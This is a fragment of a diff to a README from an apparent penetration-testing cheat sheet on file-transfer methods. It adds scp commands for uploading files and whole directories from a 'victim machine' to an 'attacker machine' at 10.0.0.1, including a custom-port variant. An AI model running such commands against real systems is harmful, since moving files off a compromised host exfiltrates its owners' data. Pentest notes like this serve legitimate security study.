Kiosec/Tranfert-Methods/README.md

 root# scp -i ~/.ssh/id_rsa myfile.txt user@10.0.0.1

-• From the victim machine, upload something on the attacker machine scp myfile.txt root@10.0.0.1:/root/ .
+• From the victim machine, upload something on the attacker machine scp myfile root@10.0.0.1:/home/kiosec/Documents/ scp myfile.txt root@10.0.0.1:/root/ .

+using a custom port, you can specify it with the -P flag: scp -P 2222 myfile root@10.0.0.1:/home/kiosec/Documents/

+copy an entire directory, use the -r flag for recursive copy: scp -r /path/to/local/folder root@10.0.0.1:/home/kiosec/Documents/

 ```